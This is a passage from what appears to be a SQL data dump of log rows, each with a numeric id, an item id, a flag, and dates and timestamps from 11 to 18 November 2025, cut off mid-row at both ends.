16:36:34'),(95042,4950,1,'2025-11-11','2025-11-11 16:41:14'),(95043,4950,1,'2025-11-11','2025-11-11 16:47:06'),(95044,2904,1,'2025-11-11','2025-11-11 16:47:28'),(95045,102,1,'2025-11-11','2025-11-11 16:48:24'),(95046,74,1,'2025-11-11','2025-11-11 16:49:19'),(95047,2503,1,'2025-11-11','2025-11-11 16:49:54'),(95048,5561,1,'2025-11-11','2025-11-11 16:58:26'),(95049,80,1,'2025-11-11','2025-11-11 17:01:09'),(95050,72,1,'2025-11-11','2025-11-11 17:16:14'),(95051,3226,1,'2025-11-11','2025-11-11 17:42:43'),(95052,4400,1,'2025-11-11','2025-11-11 17:46:54'),(95053,5271,1,'2025-11-11','2025-11-11 18:48:53'),(95054,5631,1,'2025-11-11','2025-11-11 19:05:47'),(95055,4944,1,'2025-11-11','2025-11-11 19:27:04'),(95056,5631,1,'2025-11-11','2025-11-11 19:27:16'),(95057,5631,1,'2025-11-11','2025-11-11 19:42:29'),(95058,5631,1,'2025-11-11','2025-11-11 19:42:56'),(95059,5631,1,'2025-11-11','2025-11-11 19:44:25'),(95060,5631,1,'2025-11-11','2025-11-11 19:45:37'),(95061,1610,1,'2025-11-11','2025-11-11 19:49:02'),(95062,5631,1,'2025-11-11','2025-11-11 19:53:34'),(95063,5631,1,'2025-11-11','2025-11-11 19:54:41'),(95064,2775,1,'2025-11-11','2025-11-11 20:02:29'),(95065,5502,1,'2025-11-11','2025-11-11 20:04:45'),(95066,5631,1,'2025-11-11','2025-11-11 20:11:33'),(95067,5631,1,'2025-11-11','2025-11-11 20:12:47'),(95068,5631,1,'2025-11-11','2025-11-11 20:25:22'),(95069,3117,1,'2025-11-11','2025-11-11 20:26:51'),(95070,5397,1,'2025-11-11','2025-11-11 20:26:57'),(95071,1872,1,'2025-11-11','2025-11-11 20:29:11'),(95072,5631,1,'2025-11-11','2025-11-11 20:31:21'),(95073,5631,1,'2025-11-11','2025-11-11 20:32:57'),(95074,2904,1,'2025-11-11','2025-11-11 20:33:30'),(95075,87,1,'2025-11-11','2025-11-11 20:34:25'),(95076,5515,1,'2025-11-11','2025-11-11 20:35:21'),(95077,4428,1,'2025-11-11','2025-11-11 20:42:56'),(95078,5428,1,'2025-11-11','2025-11-11 21:12:15'),(95079,5631,1,'2025-11-11','2025-11-11 21:16:49'),(95080,5631,1,'2025-11-11','2025-11-11 21:20:13'),(95081,5631,1,'2025-11-11','2025-11-11 21:21:54'),(95082,5631,1,'2025-11-11','2025-11-11 21:22:32'),(95083,5631,1,'2025-11-11','2025-11-11 21:28:19'),(95084,5631,1,'2025-11-11','2025-11-11 21:34:24'),(95085,5631,1,'2025-11-11','2025-11-11 21:34:26'),(95086,5631,1,'2025-11-11','2025-11-11 21:35:16'),(95087,5631,1,'2025-11-11','2025-11-11 21:35:24'),(95088,3038,1,'2025-11-11','2025-11-11 21:35:33'),(95089,5631,1,'2025-11-11','2025-11-11 21:40:45'),(95090,5631,1,'2025-11-11','2025-11-11 21:47:14'),(95091,5631,1,'2025-11-11','2025-11-11 22:00:14'),(95092,5631,1,'2025-11-11','2025-11-11 22:03:16'),(95093,5441,1,'2025-11-11','2025-11-11 22:03:37'),(95094,5631,1,'2025-11-11','2025-11-11 22:03:50'),(95095,5631,1,'2025-11-11','2025-11-11 22:29:10'),(95096,5631,1,'2025-11-11','2025-11-11 22:37:55'),(95097,471,1,'2025-11-11','2025-11-11 22:48:20'),(95098,1608,1,'2025-11-11','2025-11-11 22:50:07'),(95099,5567,1,'2025-11-11','2025-11-11 23:05:50'),(95100,5512,1,'2025-11-11','2025-11-11 23:07:24'),(95101,5457,1,'2025-11-11','2025-11-11 23:07:30'),(95102,4660,1,'2025-11-11','2025-11-11 23:09:24'),(95103,5631,1,'2025-11-11','2025-11-11 23:30:18'),(95104,5631,1,'2025-11-11','2025-11-11 23:30:43'),(95105,5631,1,'2025-11-11','2025-11-11 23:31:08'),(95106,4977,1,'2025-11-11','2025-11-11 23:48:10'),(95107,89,1,'2025-11-11','2025-11-11 23:49:22'),(95108,2704,1,'2025-11-12','2025-11-12 00:03:36'),(95109,5454,1,'2025-11-12','2025-11-12 00:07:01'),(95110,72,1,'2025-11-12','2025-11-12 00:18:40'),(95111,5436,1,'2025-11-12','2025-11-12 00:19:56'),(95112,5631,1,'2025-11-12','2025-11-12 00:20:32'),(95113,5425,1,'2025-11-12','2025-11-12 00:20:40'),(95114,5420,1,'2025-11-12','2025-11-12 00:20:48'),(95115,5578,1,'2025-11-12','2025-11-12 00:28:52'),(95116,5631,1,'2025-11-12','2025-11-12 00:29:12'),(95117,3034,1,'2025-11-12','2025-11-12 00:35:21'),(95118,2410,1,'2025-11-12','2025-11-12 00:59:04'),(95119,4400,1,'2025-11-12','2025-11-12 01:03:48'),(95120,4722,1,'2025-11-12','2025-11-12 01:12:34'),(95121,5412,1,'2025-11-12','2025-11-12 01:12:41'),(95122,3066,1,'2025-11-12','2025-11-12 01:13:33'),(95123,3117,1,'2025-11-12','2025-11-12 01:17:44'),(95124,2904,1,'2025-11-12','2025-11-12 01:27:09'),(95125,5472,1,'2025-11-12','2025-11-12 01:28:35'),(95126,5428,1,'2025-11-12','2025-11-12 01:28:59'),(95127,3038,1,'2025-11-12','2025-11-12 01:29:22'),(95128,5409,1,'2025-11-12','2025-11-12 01:29:38'),(95129,4681,1,'2025-11-12','2025-11-12 01:29:55'),(95130,5441,1,'2025-11-12','2025-11-12 01:33:09'),(95131,5631,1,'2025-11-12','2025-11-12 01:34:08'),(95132,4681,1,'2025-11-12','2025-11-12 01:35:32'),(95133,5567,1,'2025-11-12','2025-11-12 01:37:01'),(95134,4608,1,'2025-11-12','2025-11-12 01:43:57'),(95135,5436,1,'2025-11-12','2025-11-12 01:50:30'),(95136,5420,1,'2025-11-12','2025-11-12 01:52:08'),(95137,5492,1,'2025-11-12','2025-11-12 02:07:07'),(95138,4712,1,'2025-11-12','2025-11-12 02:17:26'),(95139,3038,1,'2025-11-12','2025-11-12 02:17:52'),(95140,91,1,'2025-11-12','2025-11-12 02:32:30'),(95141,2704,1,'2025-11-12','2025-11-12 03:14:17'),(95142,80,1,'2025-11-12','2025-11-12 03:14:31'),(95143,5631,1,'2025-11-12','2025-11-12 03:22:39'),(95144,4966,1,'2025-11-12','2025-11-12 04:11:22'),(95145,5631,1,'2025-11-12','2025-11-12 04:22:41'),(95146,5631,1,'2025-11-12','2025-11-12 04:23:25'),(95147,5631,1,'2025-11-12','2025-11-12 04:27:26'),(95148,4663,1,'2025-11-12','2025-11-12 06:22:47'),(95149,72,1,'2025-11-12','2025-11-12 06:27:36'),(95150,5631,1,'2025-11-12','2025-11-12 07:39:53'),(95151,80,1,'2025-11-12','2025-11-12 07:43:37'),(95152,3005,1,'2025-11-12','2025-11-12 07:54:30'),(95153,76,1,'2025-11-12','2025-11-12 08:01:24'),(95154,5631,1,'2025-11-12','2025-11-12 08:19:20'),(95155,5631,1,'2025-11-12','2025-11-12 08:20:53'),(95156,1877,1,'2025-11-12','2025-11-12 09:09:46'),(95157,5631,1,'2025-11-12','2025-11-12 09:14:28'),(95158,5397,1,'2025-11-12','2025-11-12 09:19:40'),(95159,5631,1,'2025-11-12','2025-11-12 09:27:08'),(95160,1703,1,'2025-11-12','2025-11-12 09:55:42'),(95161,5631,1,'2025-11-12','2025-11-12 10:31:19'),(95162,5631,1,'2025-11-12','2025-11-12 10:43:09'),(95163,5631,1,'2025-11-12','2025-11-12 10:44:52'),(95164,5631,1,'2025-11-12','2025-11-12 10:45:16'),(95165,5631,1,'2025-11-12','2025-11-12 10:45:26'),(95166,5631,1,'2025-11-12','2025-11-12 10:54:25'),(95167,4963,1,'2025-11-12','2025-11-12 11:34:05'),(95168,87,1,'2025-11-12','2025-11-12 11:34:15'),(95169,2704,1,'2025-11-12','2025-11-12 11:35:31'),(95170,5631,1,'2025-11-12','2025-11-12 12:32:45'),(95171,5631,1,'2025-11-12','2025-11-12 12:44:23'),(95172,5631,1,'2025-11-12','2025-11-12 12:47:36'),(95173,5428,1,'2025-11-12','2025-11-12 13:53:12'),(95174,87,1,'2025-11-12','2025-11-12 14:34:10'),(95175,1728,1,'2025-11-12','2025-11-12 15:21:44'),(95176,2748,1,'2025-11-12','2025-11-12 15:36:44'),(95177,5631,1,'2025-11-12','2025-11-12 16:24:54'),(95178,80,1,'2025-11-12','2025-11-12 16:26:25'),(95179,5631,1,'2025-11-12','2025-11-12 16:28:03'),(95180,4950,1,'2025-11-12','2025-11-12 17:54:24'),(95181,5631,1,'2025-11-12','2025-11-12 18:02:01'),(95182,2813,1,'2025-11-12','2025-11-12 18:07:24'),(95183,1877,1,'2025-11-12','2025-11-12 18:07:46'),(95184,467,1,'2025-11-12','2025-11-12 18:18:51'),(95185,5320,1,'2025-11-12','2025-11-12 19:16:36'),(95186,5512,1,'2025-11-12','2025-11-12 19:59:19'),(95187,5631,1,'2025-11-12','2025-11-12 20:11:20'),(95188,5484,1,'2025-11-12','2025-11-12 21:02:01'),(95189,5593,1,'2025-11-12','2025-11-12 21:27:32'),(95190,4980,1,'2025-11-12','2025-11-12 22:12:49'),(95191,4963,1,'2025-11-12','2025-11-12 22:31:25'),(95192,5539,1,'2025-11-12','2025-11-12 22:33:45'),(95193,4457,1,'2025-11-12','2025-11-12 22:41:38'),(95194,3674,1,'2025-11-12','2025-11-12 22:46:54'),(95195,68,1,'2025-11-12','2025-11-12 23:44:48'),(95196,3781,1,'2025-11-12','2025-11-12 23:49:45'),(95197,4691,1,'2025-11-12','2025-11-12 23:55:21'),(95198,3486,1,'2025-11-12','2025-11-12 23:59:25'),(95199,4326,1,'2025-11-13','2025-11-13 00:04:03'),(95200,5618,1,'2025-11-13','2025-11-13 00:14:28'),(95201,3069,1,'2025-11-13','2025-11-13 00:25:19'),(95202,4950,1,'2025-11-13','2025-11-13 00:42:03'),(95203,5598,1,'2025-11-13','2025-11-13 00:42:35'),(95204,5323,1,'2025-11-13','2025-11-13 00:54:19'),(95205,5454,1,'2025-11-13','2025-11-13 00:54:58'),(95206,3030,1,'2025-11-13','2025-11-13 01:03:26'),(95207,5605,1,'2025-11-13','2025-11-13 01:14:20'),(95208,5292,1,'2025-11-13','2025-11-13 01:26:54'),(95209,89,1,'2025-11-13','2025-11-13 01:31:15'),(95210,89,1,'2025-11-13','2025-11-13 01:31:27'),(95211,2769,1,'2025-11-13','2025-11-13 01:32:14'),(95212,3752,1,'2025-11-13','2025-11-13 01:36:02'),(95213,84,1,'2025-11-13','2025-11-13 02:09:23'),(95214,5264,1,'2025-11-13','2025-11-13 02:37:39'),(95215,91,1,'2025-11-13','2025-11-13 02:51:48'),(95216,5582,1,'2025-11-13','2025-11-13 03:17:55'),(95217,3673,1,'2025-11-13','2025-11-13 03:23:01'),(95218,3096,1,'2025-11-13','2025-11-13 03:27:25'),(95219,3097,1,'2025-11-13','2025-11-13 03:27:56'),(95220,5454,1,'2025-11-13','2025-11-13 03:28:17'),(95221,5436,1,'2025-11-13','2025-11-13 03:34:46'),(95222,4776,1,'2025-11-13','2025-11-13 04:06:04'),(95223,4432,1,'2025-11-13','2025-11-13 04:11:01'),(95224,5570,1,'2025-11-13','2025-11-13 04:15:57'),(95225,5317,1,'2025-11-13','2025-11-13 04:27:03'),(95226,4950,1,'2025-11-13','2025-11-13 04:31:24'),(95227,1598,1,'2025-11-13','2025-11-13 05:23:51'),(95228,5545,1,'2025-11-13','2025-11-13 05:25:55'),(95229,5400,1,'2025-11-13','2025-11-13 05:32:15'),(95230,4529,1,'2025-11-13','2025-11-13 05:44:13'),(95231,5573,1,'2025-11-13','2025-11-13 07:25:02'),(95232,2297,1,'2025-11-13','2025-11-13 07:42:29'),(95233,5397,1,'2025-11-13','2025-11-13 07:59:57'),(95234,1877,1,'2025-11-13','2025-11-13 08:05:50'),(95235,102,1,'2025-11-13','2025-11-13 08:12:31'),(95236,80,1,'2025-11-13','2025-11-13 08:12:39'),(95237,84,1,'2025-11-13','2025-11-13 08:23:51'),(95238,5001,1,'2025-11-13','2025-11-13 08:23:52'),(95239,4391,1,'2025-11-13','2025-11-13 08:26:34'),(95240,3541,1,'2025-11-13','2025-11-13 08:30:26'),(95241,5289,1,'2025-11-13','2025-11-13 08:43:06'),(95242,4444,1,'2025-11-13','2025-11-13 08:44:16'),(95243,476,1,'2025-11-13','2025-11-13 08:52:03'),(95244,1724,1,'2025-11-13','2025-11-13 08:54:39'),(95245,1582,1,'2025-11-13','2025-11-13 08:56:10'),(95246,4878,1,'2025-11-13','2025-11-13 08:56:55'),(95247,3117,1,'2025-11-13','2025-11-13 08:57:02'),(95248,5406,1,'2025-11-13','2025-11-13 08:59:34'),(95249,89,1,'2025-11-13','2025-11-13 09:15:37'),(95250,89,1,'2025-11-13','2025-11-13 09:15:54'),(95251,2769,1,'2025-11-13','2025-11-13 09:16:46'),(95252,4432,1,'2025-11-13','2025-11-13 09:19:01'),(95253,5409,1,'2025-11-13','2025-11-13 09:19:32'),(95254,5409,1,'2025-11-13','2025-11-13 09:19:36'),(95255,5631,1,'2025-11-13','2025-11-13 09:20:31'),(95256,5037,1,'2025-11-13','2025-11-13 09:23:38'),(95257,5631,1,'2025-11-13','2025-11-13 09:25:21'),(95258,4674,1,'2025-11-13','2025-11-13 09:27:33'),(95259,4893,1,'2025-11-13','2025-11-13 09:29:37'),(95260,68,1,'2025-11-13','2025-11-13 09:33:42'),(95261,1877,1,'2025-11-13','2025-11-13 09:33:58'),(95262,2956,1,'2025-11-13','2025-11-13 09:45:34'),(95263,4660,1,'2025-11-13','2025-11-13 09:53:59'),(95264,4897,1,'2025-11-13','2025-11-13 09:57:27'),(95265,5561,1,'2025-11-13','2025-11-13 10:05:09'),(95266,5125,1,'2025-11-13','2025-11-13 10:11:11'),(95267,4750,1,'2025-11-13','2025-11-13 10:41:01'),(95268,4332,1,'2025-11-13','2025-11-13 10:43:54'),(95269,3027,1,'2025-11-13','2025-11-13 11:01:01'),(95270,4373,1,'2025-11-13','2025-11-13 11:13:49'),(95271,3045,1,'2025-11-13','2025-11-13 11:13:56'),(95272,5259,1,'2025-11-13','2025-11-13 11:19:54'),(95273,4950,1,'2025-11-13','2025-11-13 11:38:24'),(95274,4950,1,'2025-11-13','2025-11-13 11:40:42'),(95275,4977,1,'2025-11-13','2025-11-13 12:00:33'),(95276,5307,1,'2025-11-13','2025-11-13 12:21:15'),(95277,68,1,'2025-11-13','2025-11-13 12:28:00'),(95278,72,1,'2025-11-13','2025-11-13 12:47:51'),(95279,5449,1,'2025-11-13','2025-11-13 12:50:24'),(95280,4983,1,'2025-11-13','2025-11-13 13:17:46'),(95281,3486,1,'2025-11-13','2025-11-13 13:45:46'),(95282,5461,1,'2025-11-13','2025-11-13 13:45:48'),(95283,5464,1,'2025-11-13','2025-11-13 14:10:43'),(95284,4681,1,'2025-11-13','2025-11-13 14:11:05'),(95285,2704,1,'2025-11-13','2025-11-13 14:56:44'),(95286,1608,1,'2025-11-13','2025-11-13 15:11:25'),(95287,2813,1,'2025-11-13','2025-11-13 16:09:53'),(95288,5406,1,'2025-11-13','2025-11-13 16:11:06'),(95289,3307,1,'2025-11-13','2025-11-13 17:17:01'),(95290,5397,1,'2025-11-13','2025-11-13 17:28:27'),(95291,5433,1,'2025-11-13','2025-11-13 17:30:39'),(95292,3752,1,'2025-11-13','2025-11-13 17:32:00'),(95293,5515,1,'2025-11-13','2025-11-13 17:35:36'),(95294,1728,1,'2025-11-13','2025-11-13 17:41:20'),(95295,5457,1,'2025-11-13','2025-11-13 17:47:33'),(95296,5400,1,'2025-11-13','2025-11-13 18:00:33'),(95297,4529,1,'2025-11-13','2025-11-13 18:00:39'),(95298,5578,1,'2025-11-13','2025-11-13 18:09:40'),(95299,5406,1,'2025-11-13','2025-11-13 18:25:28'),(95300,1602,1,'2025-11-13','2025-11-13 18:27:06'),(95301,3038,1,'2025-11-13','2025-11-13 18:36:43'),(95302,5409,1,'2025-11-13','2025-11-13 18:36:52'),(95303,5567,1,'2025-11-13','2025-11-13 18:39:50'),(95304,4977,1,'2025-11-13','2025-11-13 18:50:20'),(95305,5420,1,'2025-11-13','2025-11-13 19:02:59'),(95306,1774,1,'2025-11-13','2025-11-13 19:12:27'),(95307,4983,1,'2025-11-13','2025-11-13 19:18:00'),(95308,110,1,'2025-11-13','2025-11-13 19:30:06'),(95309,4681,1,'2025-11-13','2025-11-13 19:30:58'),(95310,4712,1,'2025-11-13','2025-11-13 19:42:14'),(95311,1728,1,'2025-11-13','2025-11-13 20:12:33'),(95312,1780,1,'2025-11-13','2025-11-13 21:17:38'),(95313,1582,1,'2025-11-13','2025-11-13 22:52:05'),(95314,4368,1,'2025-11-14','2025-11-14 00:09:24'),(95315,1604,1,'2025-11-14','2025-11-14 00:35:52'),(95316,2804,1,'2025-11-14','2025-11-14 01:03:16'),(95317,2704,1,'2025-11-14','2025-11-14 01:03:37'),(95318,84,1,'2025-11-14','2025-11-14 01:09:44'),(95319,80,1,'2025-11-14','2025-11-14 01:30:41'),(95320,3102,1,'2025-11-14','2025-11-14 02:10:50'),(95321,5310,1,'2025-11-14','2025-11-14 02:19:27'),(95322,1608,1,'2025-11-14','2025-11-14 02:22:36'),(95323,91,1,'2025-11-14','2025-11-14 03:13:27'),(95324,4966,1,'2025-11-14','2025-11-14 05:10:48'),(95325,5536,1,'2025-11-14','2025-11-14 05:58:53'),(95326,1544,1,'2025-11-14','2025-11-14 07:09:49'),(95327,5557,1,'2025-11-14','2025-11-14 07:35:40'),(95328,5495,1,'2025-11-14','2025-11-14 08:22:06'),(95329,5449,1,'2025-11-14','2025-11-14 08:24:20'),(95330,4428,1,'2025-11-14','2025-11-14 08:24:34'),(95331,3229,1,'2025-11-14','2025-11-14 09:52:46'),(95332,5578,1,'2025-11-14','2025-11-14 10:06:13'),(95333,5631,1,'2025-11-14','2025-11-14 10:45:07'),(95334,467,1,'2025-11-14','2025-11-14 11:42:56'),(95335,3724,1,'2025-11-14','2025-11-14 12:38:41'),(95336,5428,1,'2025-11-14','2025-11-14 13:19:56'),(95337,1594,1,'2025-11-14','2025-11-14 13:30:07'),(95338,5259,1,'2025-11-14','2025-11-14 15:03:19'),(95339,3267,1,'2025-11-14','2025-11-14 15:47:32'),(95340,5631,1,'2025-11-14','2025-11-14 16:25:49'),(95341,2813,1,'2025-11-14','2025-11-14 16:36:10'),(95342,1608,1,'2025-11-14','2025-11-14 18:11:24'),(95343,5363,1,'2025-11-14','2025-11-14 18:15:35'),(95344,5406,1,'2025-11-14','2025-11-14 18:30:12'),(95345,5502,1,'2025-11-14','2025-11-14 18:46:09'),(95346,3781,1,'2025-11-14','2025-11-14 19:44:08'),(95347,2411,1,'2025-11-14','2025-11-14 19:48:05'),(95348,3069,1,'2025-11-14','2025-11-14 20:01:59'),(95349,1584,1,'2025-11-14','2025-11-14 20:12:21'),(95350,4977,1,'2025-11-14','2025-11-14 20:37:59'),(95351,5593,1,'2025-11-14','2025-11-14 21:03:04'),(95352,5397,1,'2025-11-14','2025-11-14 21:30:05'),(95353,5512,1,'2025-11-14','2025-11-14 22:05:41'),(95354,4660,1,'2025-11-14','2025-11-14 22:35:34'),(95355,5570,1,'2025-11-14','2025-11-14 23:02:50'),(95356,5512,1,'2025-11-14','2025-11-14 23:11:44'),(95357,2813,1,'2025-11-14','2025-11-14 23:43:47'),(95358,5454,1,'2025-11-14','2025-11-14 23:43:48'),(95359,1877,1,'2025-11-15','2025-11-15 00:29:23'),(95360,2813,1,'2025-11-15','2025-11-15 00:36:13'),(95361,5425,1,'2025-11-15','2025-11-15 01:07:27'),(95362,5134,1,'2025-11-15','2025-11-15 01:08:57'),(95363,2813,1,'2025-11-15','2025-11-15 01:10:04'),(95364,4400,1,'2025-11-15','2025-11-15 02:32:35'),(95365,91,1,'2025-11-15','2025-11-15 03:23:35'),(95366,4722,1,'2025-11-15','2025-11-15 03:57:12'),(95367,5412,1,'2025-11-15','2025-11-15 04:00:13'),(95368,5553,1,'2025-11-15','2025-11-15 04:49:56'),(95369,3265,1,'2025-11-15','2025-11-15 04:52:07'),(95370,5289,1,'2025-11-15','2025-11-15 05:09:36'),(95371,5522,1,'2025-11-15','2025-11-15 05:30:20'),(95372,3117,1,'2025-11-15','2025-11-15 05:34:18'),(95373,2904,1,'2025-11-15','2025-11-15 06:00:10'),(95374,5428,1,'2025-11-15','2025-11-15 06:41:17'),(95375,5561,1,'2025-11-15','2025-11-15 07:05:31'),(95376,5441,1,'2025-11-15','2025-11-15 07:09:22'),(95377,5125,1,'2025-11-15','2025-11-15 07:14:01'),(95378,5457,1,'2025-11-15','2025-11-15 07:35:04'),(95379,80,1,'2025-11-15','2025-11-15 08:03:38'),(95380,3045,1,'2025-11-15','2025-11-15 09:00:58'),(95381,2165,1,'2025-11-15','2025-11-15 09:27:54'),(95382,4960,1,'2025-11-15','2025-11-15 10:13:54'),(95383,335,1,'2025-11-15','2025-11-15 10:17:22'),(95384,5631,1,'2025-11-15','2025-11-15 12:03:48'),(95385,5449,1,'2025-11-15','2025-11-15 12:34:32'),(95386,72,1,'2025-11-15','2025-11-15 12:57:34'),(95387,4950,1,'2025-11-15','2025-11-15 15:13:49'),(95388,4960,1,'2025-11-15','2025-11-15 15:33:20'),(95389,5549,1,'2025-11-15','2025-11-15 15:52:53'),(95390,5461,1,'2025-11-15','2025-11-15 16:06:56'),(95391,3486,1,'2025-11-15','2025-11-15 16:11:12'),(95392,5492,1,'2025-11-15','2025-11-15 16:58:20'),(95393,5593,1,'2025-11-15','2025-11-15 17:33:03'),(95394,2704,1,'2025-11-15','2025-11-15 17:41:00'),(95395,5502,1,'2025-11-15','2025-11-15 18:10:50'),(95396,5464,1,'2025-11-15','2025-11-15 18:15:06'),(95397,1586,1,'2025-11-15','2025-11-15 19:03:52'),(95398,3781,1,'2025-11-15','2025-11-15 19:04:40'),(95399,3069,1,'2025-11-15','2025-11-15 19:16:51'),(95400,5397,1,'2025-11-15','2025-11-15 19:21:40'),(95401,1877,1,'2025-11-15','2025-11-15 19:33:01'),(95402,4944,1,'2025-11-15','2025-11-15 20:05:06'),(95403,3752,1,'2025-11-15','2025-11-15 20:09:39'),(95404,3738,1,'2025-11-15','2025-11-15 20:15:56'),(95405,3749,1,'2025-11-15','2025-11-15 20:24:08'),(95406,4960,1,'2025-11-15','2025-11-15 21:16:08'),(95407,5512,1,'2025-11-15','2025-11-15 21:26:01'),(95408,5457,1,'2025-11-15','2025-11-15 21:31:07'),(95409,4660,1,'2025-11-15','2025-11-15 21:56:36'),(95410,3229,1,'2025-11-15','2025-11-15 22:36:22'),(95411,72,1,'2025-11-15','2025-11-15 23:07:22'),(95412,4529,1,'2025-11-15','2025-11-15 23:53:17'),(95413,5425,1,'2025-11-16','2025-11-16 00:12:49'),(95414,5631,1,'2025-11-16','2025-11-16 00:46:23'),(95415,5593,1,'2025-11-16','2025-11-16 00:51:42'),(95416,467,1,'2025-11-16','2025-11-16 02:00:26'),(95417,4722,1,'2025-11-16','2025-11-16 02:49:57'),(95418,5412,1,'2025-11-16','2025-11-16 02:57:35'),(95419,5314,1,'2025-11-16','2025-11-16 03:24:33'),(95420,91,1,'2025-11-16','2025-11-16 03:28:29'),(95421,5406,1,'2025-11-16','2025-11-16 03:55:43'),(95422,2704,1,'2025-11-16','2025-11-16 04:01:22'),(95423,76,1,'2025-11-16','2025-11-16 04:07:29'),(95424,80,1,'2025-11-16','2025-11-16 04:09:08'),(95425,3117,1,'2025-11-16','2025-11-16 04:14:32'),(95426,2904,1,'2025-11-16','2025-11-16 04:38:25'),(95427,5428,1,'2025-11-16','2025-11-16 05:17:19'),(95428,3038,1,'2025-11-16','2025-11-16 05:35:00'),(95429,5561,1,'2025-11-16','2025-11-16 05:48:14'),(95430,5409,1,'2025-11-16','2025-11-16 05:48:19'),(95431,5441,1,'2025-11-16','2025-11-16 05:55:01'),(95432,5125,1,'2025-11-16','2025-11-16 06:02:25'),(95433,3045,1,'2025-11-16','2025-11-16 08:02:48'),(95434,3691,1,'2025-11-16','2025-11-16 08:31:51'),(95435,2813,1,'2025-11-16','2025-11-16 08:32:20'),(95436,68,1,'2025-11-16','2025-11-16 08:43:39'),(95437,5561,1,'2025-11-16','2025-11-16 08:57:34'),(95438,4950,1,'2025-11-16','2025-11-16 09:14:15'),(95439,4950,1,'2025-11-16','2025-11-16 09:16:01'),(95440,4977,1,'2025-11-16','2025-11-16 09:29:35'),(95441,4893,1,'2025-11-16','2025-11-16 10:37:16'),(95442,5409,1,'2025-11-16','2025-11-16 10:38:23'),(95443,1772,1,'2025-11-16','2025-11-16 11:15:45'),(95444,5420,1,'2025-11-16','2025-11-16 12:23:07'),(95445,4893,1,'2025-11-16','2025-11-16 12:42:46'),(95446,5409,1,'2025-11-16','2025-11-16 12:43:24'),(95447,2813,1,'2025-11-16','2025-11-16 12:44:37'),(95448,4983,1,'2025-11-16','2025-11-16 13:50:43'),(95449,1772,1,'2025-11-16','2025-11-16 14:29:45'),(95450,3486,1,'2025-11-16','2025-11-16 14:33:29'),(95451,4893,1,'2025-11-16','2025-11-16 15:02:48'),(95452,80,1,'2025-11-16','2025-11-16 15:03:21'),(95453,2813,1,'2025-11-16','2025-11-16 15:03:46'),(95454,5409,1,'2025-11-16','2025-11-16 15:04:52'),(95455,5492,1,'2025-11-16','2025-11-16 15:12:32'),(95456,5512,1,'2025-11-16','2025-11-16 15:22:31'),(95457,110,1,'2025-11-16','2025-11-16 15:41:16'),(95458,4681,1,'2025-11-16','2025-11-16 15:46:33'),(95459,4712,1,'2025-11-16','2025-11-16 15:46:38'),(95460,5464,1,'2025-11-16','2025-11-16 15:46:54'),(95461,467,1,'2025-11-16','2025-11-16 16:24:14'),(95462,3307,1,'2025-11-16','2025-11-16 17:15:50'),(95463,5515,1,'2025-11-16','2025-11-16 17:26:13'),(95464,5433,1,'2025-11-16','2025-11-16 17:29:04'),(95465,5454,1,'2025-11-16','2025-11-16 17:48:46'),(95466,5570,1,'2025-11-16','2025-11-16 17:49:17'),(95467,5400,1,'2025-11-16','2025-11-16 17:53:28'),(95468,5578,1,'2025-11-16','2025-11-16 18:01:41'),(95469,5489,1,'2025-11-16','2025-11-16 18:07:24'),(95470,1711,1,'2025-11-16','2025-11-16 18:10:31'),(95471,2411,1,'2025-11-16','2025-11-16 18:23:53'),(95472,5567,1,'2025-11-16','2025-11-16 18:32:49'),(95473,72,1,'2025-11-16','2025-11-16 18:49:17'),(95474,4950,1,'2025-11-16','2025-11-16 18:49:34'),(95475,5436,1,'2025-11-16','2025-11-16 18:50:15'),(95476,5449,1,'2025-11-16','2025-11-16 18:50:24'),(95477,5461,1,'2025-11-16','2025-11-16 19:03:41'),(95478,467,1,'2025-11-16','2025-11-16 19:36:41'),(95479,467,1,'2025-11-16','2025-11-16 19:38:14'),(95480,3313,1,'2025-11-16','2025-11-16 20:12:57'),(95481,80,1,'2025-11-16','2025-11-16 22:42:01'),(95482,5492,1,'2025-11-16','2025-11-16 23:23:35'),(95483,4556,1,'2025-11-16','2025-11-16 23:30:39'),(95484,5140,1,'2025-11-17','2025-11-17 00:03:58'),(95485,80,1,'2025-11-17','2025-11-17 00:28:54'),(95486,4950,1,'2025-11-17','2025-11-17 03:03:01'),(95487,91,1,'2025-11-17','2025-11-17 04:02:22'),(95488,5163,1,'2025-11-17','2025-11-17 04:11:20'),(95489,3253,1,'2025-11-17','2025-11-17 09:18:32'),(95490,468,1,'2025-11-17','2025-11-17 11:09:40'),(95491,4950,1,'2025-11-17','2025-11-17 11:49:42'),(95492,4950,1,'2025-11-17','2025-11-17 11:53:21'),(95493,4950,1,'2025-11-17','2025-11-17 11:53:41'),(95494,5502,1,'2025-11-17','2025-11-17 12:09:15'),(95495,5502,1,'2025-11-17','2025-11-17 12:17:49'),(95496,5359,1,'2025-11-17','2025-11-17 12:33:51'),(95497,5573,1,'2025-11-17','2025-11-17 12:47:40'),(95498,5573,1,'2025-11-17','2025-11-17 12:47:40'),(95499,5573,1,'2025-11-17','2025-11-17 12:47:45'),(95500,5631,1,'2025-11-17','2025-11-17 14:33:05'),(95501,3285,1,'2025-11-17','2025-11-17 15:29:03'),(95502,5570,1,'2025-11-17','2025-11-17 16:35:12'),(95503,1582,1,'2025-11-17','2025-11-17 16:46:28'),(95504,3083,1,'2025-11-17','2025-11-17 16:59:12'),(95505,3253,1,'2025-11-17','2025-11-17 18:22:13'),(95506,5502,1,'2025-11-17','2025-11-17 18:43:41'),(95507,3069,1,'2025-11-17','2025-11-17 19:08:44'),(95508,3752,1,'2025-11-17','2025-11-17 19:59:02'),(95509,5512,1,'2025-11-17','2025-11-17 21:05:30'),(95510,80,1,'2025-11-17','2025-11-17 21:08:46'),(95511,1772,1,'2025-11-17','2025-11-17 21:21:07'),(95512,1877,1,'2025-11-17','2025-11-17 21:30:52'),(95513,1612,1,'2025-11-17','2025-11-17 21:34:48'),(95514,89,1,'2025-11-17','2025-11-17 21:40:21'),(95515,4660,1,'2025-11-17','2025-11-17 21:45:09'),(95516,5570,1,'2025-11-17','2025-11-17 21:52:56'),(95517,4529,1,'2025-11-17','2025-11-17 22:52:43'),(95518,5593,1,'2025-11-17','2025-11-17 23:38:06'),(95519,5400,1,'2025-11-18','2025-11-18 00:24:09'),(95520,5489,1,'2025-11-18','2025-11-18 00:29:52'),(95521,4722,1,'2025-11-18','2025-11-18 00:44:15'),(95522,4950,1,'2025-11-18','2025-11-18 00:53:37'),(95523,3117,1,'2025-11-18','2025-11-18 01:06:32'),(95524,91,1,'2025-11-18','2025-11-18 01:22:32'),(95525,3038,1,'2025-11-18','2025-11-18 01:46:41'),(95526,5125,1,'2025-11-18','2025-11-18 